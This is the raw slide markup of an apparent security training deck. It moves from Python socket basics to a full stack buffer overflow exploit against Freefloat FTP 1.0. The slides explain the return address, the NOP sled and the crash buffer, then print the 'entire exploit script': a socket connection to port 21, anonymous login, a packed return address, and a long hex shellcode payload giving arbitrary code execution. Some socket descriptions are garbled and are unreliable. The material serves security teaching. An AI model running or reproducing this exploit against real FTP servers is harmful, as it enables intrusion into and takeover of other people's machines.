                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="5400"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="3600">
              <a:latin typeface="Russo One"/>
              <a:ea typeface="Russo One"/>
              <a:cs typeface="Russo One"/>
              <a:sym typeface="Russo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e9adf94182_2_45"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="91096" y="8514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TCP Full Connect Scan CONTD..</a:t>
            </a:r>
            <a:endParaRPr sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="257" name="Google Shape;257;g1e9adf94182_2_45"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="148400" y="2107725"/>
            <a:ext cx="11390700" cy="3599400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="45700">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-349250" lvl="0" marL="349250" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>socket.socket ([family[, type[, proto]]]) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>- This function creates an instance of a new socket given the family. Options for the socket family are AF_INET, AF_INE16, or AF UNIX. Additionally, the socket can be specified as SOCK STREAM for a TOP socket or 5OCK DGRAM for a UDP socket. Finally, the protocol number is usually zero and is omitted in host cases.</a:t>
            </a:r>
            <a:endParaRPr sz="2500"/>
          </a:p>
          <a:p>
            <a:pPr indent="-349250" lvl="0" marL="349250" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>socket.create connection(address(. timeout(, source address]]) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>- This function takes a 2 tuple "hosle port) and returns an Instance of a network socket. Additionally, it has the option of taking a timeout and source address.</a:t>
            </a:r>
            <a:endParaRPr sz="2500"/>
          </a:p>
          <a:p>
            <a:pPr indent="-349250" lvl="0" marL="349250" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Search for some sites you like and try understanding this better. You can go with this if you want to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://realpython.com/python-sockets/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="25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g1e9a65c21fa_51_28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="148371" y="9987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Adding the Key Elements of the Attack</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3200"/>
            </a:br>
            <a:endParaRPr sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="820" name="Google Shape;820;g1e9a65c21fa_51_28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2259847"/>
            <a:ext cx="11263440" cy="3599400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="45700">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>The return address variable points to a specific location in the kernel32.dll file, which is a system library in windows operating system. The instruction at that location jumps directly to the top of the stack. This allows the exploit to redirect the flow of execution to the payload.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>The padding variable contains a series of 150 NOP instructions, which are a type of code that does nothing. This is known as a "NOP-sled" and it is used to increase the chances of the exploit successfully executing by providing a larger target area for the return address.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Finally, all of these variables are assembled together into a variable called crash, which when executed will cause the software to crash and execute the payload.</a:t>
            </a:r>
            <a:endParaRPr>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g1e9a65c21fa_51_33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="140171" y="10724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Sending the Exploit</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3200"/>
            </a:br>
            <a:endParaRPr sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="826" name="Google Shape;826;g1e9a65c21fa_51_33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="680326" y="2336875"/>
            <a:ext cx="11191800" cy="3599400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="45700">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="342900" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Using the Berkeley Socket API, we will create a connection to the TCP port 21 on our target host. If this connection succeeds, we will then authenticate to the host by sending an anonymous username and password. </a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-190500" lvl="0" marL="495300" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="342900" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Finally, we will send the FIP command "RETR" followed by our crash variable. Since the affected program does not properly sanitize user input, this will result in a stack-based buffer overflow that overwrites the EIP register allowing the program to jump directly into and execute our shellcode.</a:t>
            </a:r>
            <a:endParaRPr sz="2000">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g1e9a65c21fa_51_38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="140171" y="10724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Sending the Exploit</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3200"/>
            </a:br>
            <a:endParaRPr sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="832" name="Google Shape;832;g1e9a65c21fa_51_38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="478420" y="3043884"/>
            <a:ext cx="11235159" cy="3599316"/>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1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>This passage is describing a process of exploiting a buffer overflow vulnerability in a program that runs on a remote host, using the Berkeley Socket API. The Berkeley Socket API is a programming interface that allows developers to create network applications.</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>The process begins by creating a connection to the TCP port 21 on the target host using the Berkeley Socket API. If the connection is successful, the exploit will authenticate to the host by sending an anonymous username and password.</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="833" name="Google Shape;833;g1e9a65c21fa_51_38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="140171" y="2309681"/>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g1e9a65c21fa_51_44"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="140171" y="10724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Sending the Exploit</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3200"/>
            </a:br>
            <a:endParaRPr sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="839" name="Google Shape;839;g1e9a65c21fa_51_44"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="680321" y="2336873"/>
            <a:ext cx="11263440" cy="3599316"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="45700">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Next, the exploit sends the FTP command "RETR" followed by the "crash" variable created previously. The FTP server software does not properly sanitize user input, which allows the crash variable to cause a stack-based buffer overflow. This buffer overflow overwrites the EIP register, which is a register used to store the memory address of the next instruction to be executed.</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>By overwriting the EIP register, the exploit can redirect the flow of execution to the shellcode payload, which is executed as a result of the exploit. The payload allows the attacker to run arbitrary code on the target machine.</a:t>
            </a:r>
            <a:endParaRPr sz="2000">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37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="132021" y="8268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ENTIRE EXPLOIT SCRIPT</a:t>
            </a:r>
            <a:endParaRPr sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="845" name="Google Shape;845;p37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="254425" y="2140975"/>
            <a:ext cx="11396400" cy="462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struct</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sys</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time</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len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sys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argv</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&lt;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2</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"[-]Usage: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="1600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="D19A66"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>%s</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="1600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="98C379"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> &lt;target addr&gt; &lt;command&gt;"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sys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argv</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0</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\r</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"[-]For example [filename.py 192.168.1.10 PWND] would do the trick."</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"[-]Other options: AUTH, APPE, ALLO, ACCT"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sys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exit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0</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target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sys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argv</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command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sys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argv</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2</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len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sys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argv</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&gt;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2</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platform</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sys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argv</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2</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g1fe188b01e2_0_111"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="132021" y="8268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ENTIRE EXPLOIT SCRIPT</a:t>
            </a:r>
            <a:endParaRPr sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="851" name="Google Shape;851;g1fe188b01e2_0_111"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="254425" y="2140975"/>
            <a:ext cx="11396400" cy="462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E06C75"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>shellcode</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\xbf\x5c\x2a\x11\xb3\xd9\xe5\xd9\x74\x24\xf4\x5d\x33\xc9</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\xb1\x56\x83\xc5\x04\x31\x7d\x0f\x03\x7d\x53\xc8\xe4\x4f</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\x83\x85\x07\xb0\x53\xf6\x8e\x55\x62\x24\xf4\x1e\xd6\xf8</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\x7e\x72\xda\x73\xd2\x67\x69\xf1\xfb\x88\xda\xbc\xdd\xa7</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\xdb\x70\xe2\x64\x1f\x12\x9e\x76\x73\xf4\x9f\xb8\x86\xf5</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\xd8\xa5\x68\xa7\xb1\xa2\xda\x58\xb5\xf7\xe6\x59\x19\x7c</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\x56\x22\x1c\x43\x22\x98\x1f\x94\x9a\x97\x68\x0c\x91\xf0</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\x48\x2d\x76\xe3\xb5\x64\xf3\xd0\x4e\x77\xd5\x28\xae\x49</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\x19\xe6\x91\x65\x94\xf6\xd6\x42\x46\x8d\x2c\xb1\xfb\x96</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\xf6\xcb\x27\x12\xeb\x6c\xac\x84\xcf\x8d\x61\x52\x9b\x82</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\xce\x10\xc3\x86\xd1\xf5\x7f\xb2\x5a\xf8\xaf\x32\x18\xdf</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\x6b\x1e\xfb\x7e\x2d\xfa\xaa\x7f\x2d\xa2\x13\xda\x25\x41</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\x40\x5c\x64\x0e\xa5\x53\x97\xce\xa1\xe4\xe4\xfc\x6e\x5f</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\x63\x4d\xe7\x79\x74\xb2\xd2\x3e\xea\x4d\xdc\x3e\x22\x8a</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\x88\x6e\x5c\x3b\xb0\xe4\x9c\xc4\x65\xaa\xcc\x6a\xd5\x0b</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rgbClr val="282C34"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>             </a:t>
            </a:r>
            <a:endParaRPr b="0" i="1" sz="14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g1fe188b01e2_0_117"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="132021" y="8268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ENTIRE EXPLOIT SCRIPT</a:t>
            </a:r>
            <a:endParaRPr sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="857" name="Google Shape;857;g1fe188b01e2_0_117"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="254425" y="2140975"/>
            <a:ext cx="11396400" cy="462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371600" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="135714"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pP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\xbd\xca\x85\xe3\xd7\xc4\xfa\x14\xd8\x0e\x8d\x12\x16\x6a</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\xde\xf4\x5b\x8c\xf1\x58\xd5\x6a\x9b\x70\xb3\x25\x33\xb3</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\xe0\xfd\xa4\xcc\xc2\x51\x7d\x5b\x5a\xbc\xb9\x64\x5b\xea</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\xea\xc9\xf3\x7d\x78\x02\xc0\x9c\x7f\x0f\x60\xd6\xb8\xd8</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\xfa\x86\x0b\x78\xfa\x82\xfb\x19\x69\x49\xfb\x54\x92\xc6</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\xac\x31\x64\x1f\x38\xac\xdf\x89\x5e\x2d\xb9\xf2\xda\xea</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\x7a\xfc\xe3\x7f\xc6\xda\xf3\xb9\xc7\x66\xa7\x15\x9e\x30</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\x11\xd0\x48\xf3\xcb\x8a\x27\x5d\x9b\x4b\x04\x5e\xdd\x53</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\x41\x28\x01\xe5\x3c\x6d\x3e\xca\xa8\x79\x47\x36\x49\x85</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\x92\xf2\x79\xcc\xbe\x53\x12\x89\x2b\xe6\x7f\x2a\x86\x25</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\x86\xa9\x22\xd6\x7d\xb1\x47\xd3\x3a\x75\xb4\xa9\x53\x10</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\xba\x1e\x53\x31</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 </a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1600" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="E06C75"/>
              </a:solidFill>
              <a:highlight>
                <a:schemeClr val="dk1"/>
              </a:highlight>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>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g1fe188b01e2_0_122"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="132021" y="8268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ENTIRE EXPLOIT SCRIPT</a:t>
            </a:r>
            <a:endParaRPr sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="863" name="Google Shape;863;g1fe188b01e2_0_122"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="254425" y="2140975"/>
            <a:ext cx="11396400" cy="462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ret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struct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pack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'&lt;L'</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C678DD"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>0x</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="1600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="D19A66"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>7C874413</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padding</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\x90</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150</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1600" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="D19A66"/>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crash</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\x41</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246</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decode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padding</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shellcode</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Freefloat FTP 1.0 Any Non Implemented Command Buffer Overflow</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Author: Craig Freyman (@cd1zz)</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Connecting to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target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sock</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AF_INET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SOCK_STREAM</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try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sock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connect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target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21</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OSError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Connection to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target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failed!'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sys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exit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0</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g1fe188b01e2_0_128"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="132021" y="8268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ENTIRE EXPLOIT SCRIPT</a:t>
            </a:r>
            <a:endParaRPr sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="869" name="Google Shape;869;g1fe188b01e2_0_128"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="254425" y="2140975"/>
            <a:ext cx="11396400" cy="462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Sending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repr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len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crash</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command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byte crash...'</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sock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send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'USER anonymous</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="1600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
